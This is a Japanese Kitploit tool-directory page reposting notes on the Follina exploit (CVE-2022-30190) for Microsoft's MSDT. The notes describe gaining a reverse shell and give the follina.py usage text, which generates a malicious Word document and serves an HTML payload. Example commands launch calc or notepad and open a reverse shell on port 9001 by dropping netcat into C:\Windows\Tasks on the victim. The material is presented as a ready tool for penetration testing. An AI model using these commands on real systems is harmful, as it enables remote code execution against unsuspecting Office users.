Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Follina — CVE-2022-30190 に関連するメモ | Kitploit
ツール/GitHubGitHub/abhirules27/follina
ペイロード生成脆弱性分析エクスプロイトペネトレーションテストコマンド&コントロールレッドチーミング
GitHubabhirules27/follina

Follina

CVE-2022-30190 に関連するメモ

リポジトリを見る
4年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Follina

CVE-2022-30190に関連する注意事項

FOLLINA: CVE-2022-30190

  1. Microsoftサポート診断ツール(MSDT)を使用

  2. 診断用に開かれた診断ウィンドウを悪用し、適切に実行されると攻撃者にリバースシェルを与える。

  3. Github: (a). https://github.com/JohnHammond/msdt-follina (b). https://github.com/chvancooten/follina.py

  4. 謝辞: (a). @_johnhammond (b). @networkchuck

  5. 使い方 follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT] options: -h, --help show this help message and exit --command COMMAND, -c COMMAND command to run on the target (default: calc) --output OUTPUT, -o OUTPUT output maldoc file (default: ./follina.doc) --interface INTERFACE, -i INTERFACE network interface or IP address to host the HTTP server (default: eth0) --port PORT, -p PORT port to serve the HTTP server (default: 8000)

  6. 例 (a). calc.exeを起動: $ python3 follina.py
    [+] copied staging doc /tmp/9mcvbrwo [+] created maldoc ./follina.doc [+] serving html payload on :8000 (b). notepad.exeを起動: $ python3 follina.py -c "notepad" (c). ポート9001でリバースシェルを取得。 注意: これはnetcatバイナリを被害者にダウンロードし、C:\Windows\Tasksに配置します。バイナリはクリーンアップされません。AVが無効化されていない限り、アンチウイルス検出をトリガーします。 $ python3 follina.py -r 9001

ツールをダウンロード